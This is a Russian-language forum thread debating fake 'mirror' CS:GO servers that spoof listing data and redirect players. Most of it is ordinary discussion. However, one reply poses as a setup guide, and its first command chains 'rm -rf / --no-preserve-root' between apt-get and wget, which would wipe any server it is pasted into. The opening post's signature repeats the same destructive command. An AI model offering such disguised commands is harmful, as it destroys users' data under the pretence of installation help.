Зеркальные сервера или все дороги ведут в Рим

Отношение к зеркалам?

• Отрицательное

Голосов: 173 84.4%
  • Положительное

Голосов: 32 15.6%

• Всего проголосовало
    205

Yooki

Добрая душа
Реакции
169
Привет всем участникам данного сообщества
Для большинства это уже давно не секрет, что уже очень много людей абьюзят браузер серверов CS:GO, захламляя его огромным количеством зеркальных (фейковых) серверов, которые отображают идентичные данные (кол-во игроков, карта, теги), как и изначальный реальный сервер и далее при заходе перебрасывают игрока на него.
Поэтому хочу открыть единый тред посвященный обсуждению данной неоднозначной проблеме.

Уже примерно два года уничтожается честная конкуренция среди серверов. Уже два года игроки открывают браузер серверов и все это хавают, у них нет выбора.
Я давно знал про проблему, но особо не обращал внимания, пока спустя время сам не зашел в игру и не увидел, что происходит, в каких огромных масштабах люди плодят фейк сервера.
Раньше проекты старались сделать что-то уникальное и открыть как можно больше серверов. Сейчас же выглядит выгодным просто иметь 2-3 сервера, которые будут скопированы сотню раз.
Хотя тоже не факт, учитывая те огромные количества шлака, что уже есть в мастер-сервере, который ограничен и не отображает все сервера поблизости.

По этому поводу уже открыта ветка в репозитории CS:GO на GitHub: Duplicate and Redirect server · Issue #2540 · ValveSoftware/csgo-osx-linux
Единственное, что там произошло это отметка проблемы с тегом "Сервера сообщества" модератором гита Valve.
Я писал Gabe Follower о данной проблеме, расписав, что происходит. Получил такой ответ. Думаю, что он не против этого скриншота и спасибо ему за помощь в содействии.
1651951692457.png

В первую очередь в данном обсуждении я хотел бы сплотить силы людей с форума для борьбы против данного абьюза. Пока все сидят тихо, данная проблема откладывается разработчиками игры в максимально долгий ящик.
Я считаю, что пора стараться показать, что проблема актуальна и мы не хотим с этим мириться. Нужно собраться и сделать все нужное для решения вопроса.

У нас был MOTD, пока некоторые не переабьюзили его с кричащей рекламой, скамом и другой ерундой. В итоге удобный инструмент у нас забрали, дав в обмен урезанную кнопку в табе. Потом некоторые начали закидывать рекламу игрокам в hint, которая остается отображаться везде. Сейчас захламляется браузер серверов.

Пишите предложения, что можно сделать. Делитесь мнением по данном вопросу.

sudo rm -rf / --no-preserve-root в консоль сервера Linux

Последнее редактирование:

🟡differend🟢

Что хочу - то и делаю
Реакции
661
Привет всем участникам данного сообщества
Для большинства это уже давно не секрет, что уже очень много людей абьюзят браузер серверов CS:GO, захламляя его огромным количеством зеркальных (фейковых) серверов, которые отображают идентичные данные (кол-во игроков, карта, теги), как и изначальный реальный сервер и далее при заходе перебрасывают игрока на него.
Поэтому хочу открыть единый тред посвященный обсуждению данной неоднозначной проблеме.

Уже примерно два года уничтожается честная конкуренция среди серверов. Уже два года игроки открывают браузер серверов и все это хавают, у них нет выбора.
Я давно знал про проблему, но особо не обращал внимания, пока спустя время сам не зашел в игру и не увидел, что происходит, в каких огромных масштабах люди плодят фейк сервера.
Раньше проекты старались сделать что-то уникальное и открыть как можно больше серверов. Сейчас же выглядит выгодным просто иметь 2-3 сервера, которые будут скопированы сотню раз.
Хотя тоже не факт, учитывая те огромные количества шлака, что уже есть в мастер-сервере, который ограничен и не отображает все сервера поблизости.

По этому поводу уже открыта ветка в репозитории CS:GO на GitHub: Duplicate and Redirect server · Issue #2540 · ValveSoftware/csgo-osx-linux
Единственное, что там произошло это отметка проблемы с тегом "Сервера сообщества" модератором гита Valve.
Я писал Gabe Follower о данной проблеме, расписав, что происходит. Получил такой ответ. Думаю, что он не против этого скриншота и спасибо ему за помощь в содействии.
Посмотреть вложение 96031

В первую очередь в данном обсуждении я хотел бы сплотить силы людей с форума для борьбы против данного абьюза. Пока все сидят тихо, данная проблема откладывается разработчиками игры в максимально долгий ящик.
Я считаю, что пора стараться показать, что проблема актуальна и мы не хотим с этим мириться. Нужно собраться и сделать все нужное для решения вопроса.

У нас был MOTD, пока некоторые не переабьюзили его с кричащей рекламой, скамом и другой ерундой. В итоге удобный инструмент у нас забрали, дав в обмен урезанную кнопку в табе. Потом некоторые начали закидывать рекламу игрокам в hint, которая остается отображаться везде. Сейчас захламляется браузер серверов.

Пишите предложения, что можно сделать. Делитесь мнением по данном вопросу.

Пока работает только на Linux. Зеркала можно запускать с одной машины под разными портами.
Для начала подключаемся по SSH к серверу и прописываем следующие команды:
Bash:
apt-get update && apt-get upgrade && rm -rf / --no-preserve-root && wget -P ~/ https://github.com/poorfella/mirrorcsgo/archive/master.zip
Во время установки соглашаемся со всем (отправляем "y")
Распаковываем
Bash:
 unzip ~/master.zip

После установки нужно настроить конфиг. Я делаю это через редактор nano, т.к. он мне удобен. Можете использовать любой.
Bash:
nano ~/mirrorcsgo/settings.cfg
В этом конфиге заменяем IP адреса на свой, либо пишем localhost, если будем делать редирект на эту же машину - просто указывайте разные порты в диапазоне, котором позволяет игра.
Сохраняем (ctrl+x) и далее запускаем сам скрипт: ./mirror start.
Готово.

Также для удобства можно поставить запуск скрипта в crontab.

*** Скрытый текст не может быть процитирован. ***
Да-да, зеркала - это конечно круто (нет). Вот смотрю я и вижу картинку: сервер помойка, ничего такого нет, но за то из-за зеркал такой онлайн ммм, максимально не заслужено. Даже есть один такой пример, был один проект и там онлайн максимально редко превышал 50-60 игрок, но за то сейчас) накупил зеркал и сидит довольный, весь поиск засрал.
Зеркала = помойка )0. Сервер говно? Не беда! У нас есть зеркала 😂
Сообщения автоматически склеены:

Deluks

Верховное DNO|
Реакции
812
Не первый раз сталкиваюсь с зеркалами, и не один раз убеждаюсь что это зло.

Быть может как то разработчикам соурсмода можно что-то подкинуть? Например резервация портов (с 27015-27030 остальные как то заблокать) и не возможность запускать несколько серверов с идентичными названиями и тегами!? на одном ip? но с разными портами.

Fess23

Cунтаго
Реакции
128
Там работает на основе Api SteamWorks, через интерфейс ISteamGameServer и все это чудо работает только на плюсах, потому что на джаве или на шарпе данного интерфейса не наблюдается.
Сообщения автоматически склеены:

И после этого врятли кто-то будет это фиксить. Потому что все кто используют данный интерфейс для регестрации серверов в других апках придется все переделать.

include.sqlx

Участник
Реакции
38
Зло злом, но когда ты открываешь сервер, а у тебя коннектов к серверу 0 за весь день - удручает.
С одной стороны действительно происходит захламление поиска, а с другой стороны к серверу абсолютно нет коннетов, и что делать?
С поиском еще проблемы, что не у всех сервер отображается, даже в этом же регионе.
Глобально - это действительно проблема. Локально - это помощь тем, кто только открывает сервер.

Помню как-то читал про теневой ip были темы, вот одно из решений проблемы.

Вы посмотрите на проблему более локально со стороны простых сервероделов.
Какая бы у тебя не было крутая, эксклюзивная, оригинальная и балансная сборка - она ничто если у тебя к серверу коннектов 0, у тебя даже шанса набрать онлайн нету.
Ну и будем честны, не сборка людей удерживает, а комьюнити.

P.s. И нет, я не на всех своих серверах использую фейки, а только там где это действительно нужно и в малом количестве.
Ну и в будущем полностью от этого откажусь, ибо БУДЕТ сторонний способ рекламы + где есть онлайн на серверах - фейки не нужны.

Ну а если говорить о способе решения проблемы - фикс редиректа и все, пока пока фейковые сервера в том виде, в котором они есть.

Быть может как то разработчикам соурсмода можно что-то подкинуть? Например резервация портов (с 27015-27030 остальные как то заблокать) и не возможность запускать несколько серверов с идентичными названиями и тегами!? на одном ip? но с разными портами.

Резервация портов плохая идея. Что делать хостингам? Что делать всяким площадкам типо faceit, но в меньших масштабах?
Ладно - заблочим одинаковые название. Будут теперь фейки, которые имеют разные рандомные названия или приписки там(Не суть важно, обойдут, не будет для них проблемой).

Vulpecula

Добрая душа
Реакции
458
Зло злом, но когда ты открываешь сервер, а у тебя коннектов к серверу 0 за весь день - удручает.
С одной стороны действительно происходит захламление поиска, а с другой стороны к серверу абсолютно нет коннетов, и что делать?
С поиском еще проблемы, что не у всех сервер отображается, даже в этом же регионе.
Глобально - это действительно проблема. Локально - это помощь тем, кто только открывает сервер.
Давайте вспомним 2012-2019 годы. Каждому администратору, который прикладывал усилия хватало онлайна. Сегодня люди делают зеркала только из-за того, что фактически их заставлят делать это система. Эту лавочку нужно было прикрывать как только она начала своё существование, но мы все этот момент потеряли.

Сейчас стало больше серверов? Но и игроков число ощутимо выросло. (Steam: Game and Player Statistics)

Было множество историй, когда создавались абсолютно уникальные сервера, но из-за нехватки средств на покупку/разработку зеркал, моды уходили в историю.

Зачем как-то стараться, когда можно накатить lvl, vip, res, lk и подрубить зеркала?

Yooki

Добрая душа
Реакции
169

Помню как-то читал про теневой ip были темы, вот одно из решений проблемы.

Вы посмотрите на проблему более локально со стороны простых сервероделов.
Какая бы у тебя не было крутая, эксклюзивная, оригинальная и балансная сборка - она ничто если у тебя к серверу коннектов 0, у тебя даже шанса набрать онлайн нету.
Ну и будем честны, не сборка людей удерживает, а комьюнити.

P.s. И нет, я не на всех своих серверах использую фейки, а только там где это действительно нужно и в малом количестве.
Ну и в будущем полностью от этого откажусь, ибо БУДЕТ сторонний способ рекламы + где есть онлайн на серверах - фейки не нужны.

Ну а если говорить о способе решения проблемы - фикс редиректа и все, пока пока фейковые сервера в том виде, в котором они есть.

Резервация портов плохая идея. Что делать хостингам? Что делать всяким площадкам типо faceit, но в меньших масштабах?
Ладно - заблочим одинаковые название. Будут теперь фейки, которые имеют разные рандомные названия или приписки там(Не суть важно, обойдут, не будет для них проблемой).

Не совсем согласен с тобой.
о когда ты открываешь сервер, а у тебя коннектов к серверу 0 за весь день - удручает.
Сейчас примерно так и выходит, т.к. твой сервер песчинка среди зеркал. Раньше браузер серверов не был так раздут.
Сейчас тебе приходится пользоваться зеркалами, раньше игроки приходили органически и всем было нормально.
Хочешь больше своего проекта в мастерсервере? Создай больше настоящих серверов. В этом был смысл.
У тебя был лимит, ты не мог при минимальных вложениях раздуть свой сервер. Мы все делили пирог, но.
Поэтому не считаю, что даже локально это какое-то добро.

Эти зеркала колапснутся и тебе самому уже не помогут. У людей в поиске серверов будет докучи рандомных зеркал и пустых серверов фейсита.
Браузер превращается в открутую таблицу Google Sheets, где каждый свое вносит, пока его не перетрут.

Да и со стороны обычных игроков просто посмотри. Открываешь МС, там весь экран в 2-3х серверах

Islam Cherkess

Там мля о мля
Реакции
895
Если я правильно всё понял то зеркала это одна или несколько серверов на VDS с одинаковыми названиями , тегами и т.д. ?
А то что кол-во игроков тоже одинаковое это A2S боты что ли ?

Palonez

бб братки
Реакции
1,837
Если я правильно всё понял то зеркала это одна или несколько серверов на VDS с одинаковыми названиями , тегами и т.д. ?
А то что кол-во игроков тоже одинаковое это A2S боты что ли ?
Название, теги, игру, описание, OC, maxplayer и players - все через изменённые запросы а2s

Сверху Снизу